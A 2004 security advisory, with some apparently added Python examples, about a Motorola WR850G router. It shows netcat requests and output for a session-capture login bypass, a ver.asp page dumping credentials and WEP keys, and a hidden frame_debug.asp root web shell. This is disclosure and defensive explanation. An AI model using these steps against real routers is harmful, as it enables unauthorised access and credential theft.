[NEWS] Motorola Wireless Router WR850G Authentication Circumvention
From: SecuriTeam (support_at_securiteam.com)
Date: 10/04/04
To: list@securiteam.com
Date: 4 Oct 2004 13:53:37 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Motorola Wireless Router WR850G Authentication Circumvention
------------------------------------------------------------------------
SUMMARY
"<http://broadband.motorola.com/consumers/products/wr850g/> Motorola's
WR850G Wireless Broadband Router is built with both an 802.11g wireless
access point and a 4-port Ethernet router. It's wireless. It's wired. It's
the foundation of a truly customized network and it's full of options."
The firmware of Motorola's WR850G wireless router contains a flaw that
enables an attacker to log into the router's web interface without knowing
the username/password combination, and to learn the router's username and
password after logging in.
Additionally, the firmware contains an easter egg that provides a user with
a root shell on the router's Linux system. However, this root shell can
only be opened after a successful authentication.
DETAILS
Vulnerable Systems:
* Motorola Wireless Router WR850G, Firmware v4.03
Authentication Circumvention:
One limitation of the router's firmware is that only one system at a time
can be logged into the web interface. However, the firmware does not
correctly keep track of which system is currently logged in, which makes it
possible for an attacker to log into the web interface without knowing a
username or a password.
All an attacker has to do is periodically poll for a file on the router's
web server that can only be accessed when logged into the router (most
likely the file /ver.asp; see the second vulnerability described below).
As long as nobody is logged in, the attacker receives 302 redirect
responses. However, as soon as someone who knows the password (i.e. the
real system administrator) logs into the web interface from a different
system (either behind the router or in front of it), it is the attacker,
not the system administrator, who is granted access.
Example:
server:/var/www/htdocs# nc 10.10.69.244 8080
GET /ver.asp HTTP/1.0
HTTP/1.0 302 Redirect
Server: httpd
Date: Thu, 02 Sep 2004 14:30:15 GMT
Location: redirect.asp
Content-Type: text/xml
Connection: close
[Administrator (on a different IP) successfully logs in]
server:/var/www/htdocs# nc 10.10.69.244 8080
GET /ver.asp HTTP/1.0
HTTP/1.0 200 Ok
Server: httpd
Date: Thu, 02 Sep 2004 14:32:37 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close
[snip content]
The administrator trying to log in gets the error message:
403 Only one login allowed
The existing client:192.168.107.58
This at least tells the administrator that someone is tampering with the
system.
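The session-tracking defect described above can be modelled in a few dozen lines. The following is an added example, not the router's firmware and not code from the advisory: the advisory does not show the firmware's internals, so FlawedRouterWeb is one plausible model of the behaviour it reports (login only flips a global "authenticated" flag, and the owning client is recorded lazily from whichever request arrives next), while FixedRouterWeb shows the same single-login guard done properly, with the session bound at login time to a random token and the client that actually authenticated. The administrator's address, the cookie name and the Response class are constructed; 192.168.107.58, /ver.asp, /frame_debug.asp, the 302 redirect and the "Only one login allowed" text come from the advisory.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Pages the advisory names as reachable only after logging in.
RESTRICTED = {"/ver.asp", "/frame_debug.asp"}


@dataclass
class Response:  # constructed stand-in for an HTTP response
    status: int
    body: str = ""
    headers: dict = field(default_factory=dict)


def only_one_login(existing_client):
    # Mirrors the error text the administrator sees in the advisory.
    return Response(403, f"Only one login allowed\nThe existing client:{existing_client}")


def creds_match(expected, username, password):
    # Constant-time comparison of both fields (not the flaw under discussion).
    ok_user = hmac.compare_digest(expected[0].encode(), username.encode())
    ok_pass = hmac.compare_digest(expected[1].encode(), password.encode())
    return ok_user and ok_pass


class FlawedRouterWeb:
    """Hypothetical model of the flaw: login sets a global flag only."""

    def __init__(self, username, password):
        self._creds = (username, password)
        self._authenticated = False
        self._client = None  # filled in by whichever request arrives next

    def login(self, client_ip, username, password):
        if not creds_match(self._creds, username, password):
            return Response(401)
        if self._client not in (None, client_ip):
            return only_one_login(self._client)
        self._authenticated = True
        return Response(200)

    def get(self, client_ip, path, cookie=None):
        if path in RESTRICTED:
            if not self._authenticated:
                return Response(302, headers={"Location": "redirect.asp"})
            if self._client is None:
                self._client = client_ip  # BUG: first requester after login owns the session
            if client_ip != self._client:
                return only_one_login(self._client)
        return Response(200, body=f"contents of {path}")


class FixedRouterWeb:
    """Session is created at login and bound to a token and the client
    that authenticated; a later request can never 'adopt' it."""

    def __init__(self, username, password):
        self._creds = (username, password)
        self._session = None  # (token, client_ip)

    def login(self, client_ip, username, password):
        if not creds_match(self._creds, username, password):
            return Response(401)
        if self._session is not None and self._session[1] != client_ip:
            return only_one_login(self._session[1])
        token = secrets.token_hex(16)
        self._session = (token, client_ip)
        return Response(200, headers={"Set-Cookie": f"session={token}"})

    def get(self, client_ip, path, cookie=None):
        if path in RESTRICTED:
            if (self._session is None or cookie is None
                    or not hmac.compare_digest(cookie, self._session[0])
                    or client_ip != self._session[1]):
                return Response(302, headers={"Location": "redirect.asp"})
        return Response(200, body=f"contents of {path}")


def replay_sequence(server):
    """Replays the advisory's timeline against a server model: an
    unauthenticated host polls /ver.asp, the administrator logs in from
    another address, the poller tries again, then the administrator loads
    the page. Returns the three status codes observed."""
    poller = "192.168.107.58"  # the "existing client" shown in the advisory
    admin = "192.168.107.10"   # constructed administrator address
    poll_before = server.get(poller, "/ver.asp").status
    login = server.login(admin, "admin", "strictlysecret")
    set_cookie = login.headers.get("Set-Cookie")
    cookie = set_cookie.split("=", 1)[1] if set_cookie else None
    poll_after = server.get(poller, "/ver.asp").status
    admin_view = server.get(admin, "/ver.asp", cookie=cookie).status
    return {"poll_before": poll_before, "poll_after": poll_after, "admin": admin_view}


if __name__ == "__main__":
    print("flawed:", replay_sequence(FlawedRouterWeb("admin", "strictlysecret")))
    print("fixed: ", replay_sequence(FixedRouterWeb("admin", "strictlysecret")))
```

Against the flawed model the replay reproduces the advisory exactly (302, then 200 for the poller, then 403 for the administrator); against the fixed model the poller keeps receiving 302 and only the administrator, presenting the token from the address that logged in, gets 200. The design point is that "someone is logged in" must never be a bare global flag: the authorisation decision has to be tied to a secret issued at login and checked on every request.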
Password Recovery:
The router's web server contains a page named ver.asp that outputs every
single configuration switch of the router. Among those switches are:
* Web Interface Username and Password
* WEP Encryption Keys
* SNMP Community String
* DDNS password
And so on...
The page can only be accessed when logged into the web interface either by
knowing the username and password, or by using the method described above.
Exploit:
server:/var/www/htdocs# nc 80.108.69.244 8080
GET /ver.asp HTTP/1.0
HTTP/1.0 200 Ok
Server: httpd
Date: Thu, 02 Sep 2004 13:40:09 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close
[A short excerpt of the output:]
Pmon Version: 9
Firmware version: 4.03, April.15, 2004
pptp_passwd=
http_username=admin
wl0_ssid=hugo
wl0_key1=a3b6d3351f
http_passwd=strictlysecret
wl_passphrase=tumbledry
radius_key=
SNMPCommunityOne=public
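A diagnostic page that dumps the whole configuration is only a problem because it prints credentials in the clear. The following added example (not from the advisory or the vendor) is a small audit helper for a key=value dump of this shape: it lists which entries carry a non-empty secret and produces a redacted copy that can be shared safely. SAMPLE_DUMP is the excerpt shown above; the key-name patterns in SENSITIVE_KEY are an assumption about which names denote credentials.

```python
import re

# Assumed naming convention for credential-bearing keys: the excerpt uses
# *_passwd, *_key<n>, *_passphrase and *Community*; "password"/"secret" are
# added for dumps that use those spellings.
SENSITIVE_KEY = re.compile(r"passwd|password|_key\d*\b|passphrase|community|secret",
                           re.IGNORECASE)

# The ver.asp excerpt from the advisory, used here as sample input.
SAMPLE_DUMP = """\
Pmon Version: 9
Firmware version: 4.03, April.15, 2004
pptp_passwd=
http_username=admin
wl0_ssid=hugo
wl0_key1=a3b6d3351f
http_passwd=strictlysecret
wl_passphrase=tumbledry
radius_key=
SNMPCommunityOne=public
"""


def parse_dump(text):
    """Yield (key, value) for key=value lines and (None, line) for the rest."""
    for line in text.splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            yield key.strip(), value.strip()
        else:
            yield None, line


def exposed_secrets(text):
    """Keys whose name looks sensitive and whose value is actually set."""
    return [k for k, v in parse_dump(text) if k and SENSITIVE_KEY.search(k) and v]


def redact(text):
    """The same dump with every sensitive, non-empty value masked."""
    out = []
    for key, value in parse_dump(text):
        if key is None:
            out.append(value)
        elif SENSITIVE_KEY.search(key) and value:
            out.append(f"{key}=<redacted>")
        else:
            out.append(f"{key}={value}")
    return "\n".join(out)


if __name__ == "__main__":
    print("secrets exposed:", exposed_secrets(SAMPLE_DUMP))
    print(redact(SAMPLE_DUMP))
```

On the excerpt this flags wl0_key1, http_passwd, wl_passphrase and SNMPCommunityOne (the empty pptp_passwd and radius_key are reported as not set), which is the list a reviewer would want before deciding whether such a page may be served at all.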
Easter Egg: Root Shell
In addition to the page ver.asp, the router's web server also contains a
page named frame_debug.asp that provides a web shell in which a user can
execute any command on the router's software. The page can only be accessed
when logged into the web interface, either by knowing the username and
password or by using the method described above.
Example:
#cat /proc/version
Linux version 2.4.20 (sparklan@localhost.localdomain) (gcc version 3.0
20010422 (prerelease) with bcm4710a0 modifications) #37 Thu Apr 15
16:34:09 CST 2004
#uptime
2:56pm up 7:33, load average: 0.59, 0.23, 0.09
#cat /proc/cpuinfo
system type : Broadcom BCM947XX
processor : 0
cpu model : BCM4710 V0.0
BogoMIPS : 82.94
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : no
hardware watchpoint : no
VCED exceptions : not available
VCEI exceptions : not available
dcache hits : 3694025514
dcache misses : 3395654302
icache hits : 3303822179
icache misses : 3094738920
instructions : 2214575440
Workarounds:
Even though this does not resolve the vulnerabilities, the web interface
should be configured to listen only on the LAN interface and not on the WAN
interface. This at least eliminates the risk of being attacked from the
outside, while an insider can still obtain the passwords in the way
described above.
Vendor Status:
Vendor contacted (09-02-2004 and 09-09-2004). No patch available.
ADDITIONAL INFORMATION
The information has been provided by <d.fabian@sec-consult.com> Daniel
Fabian.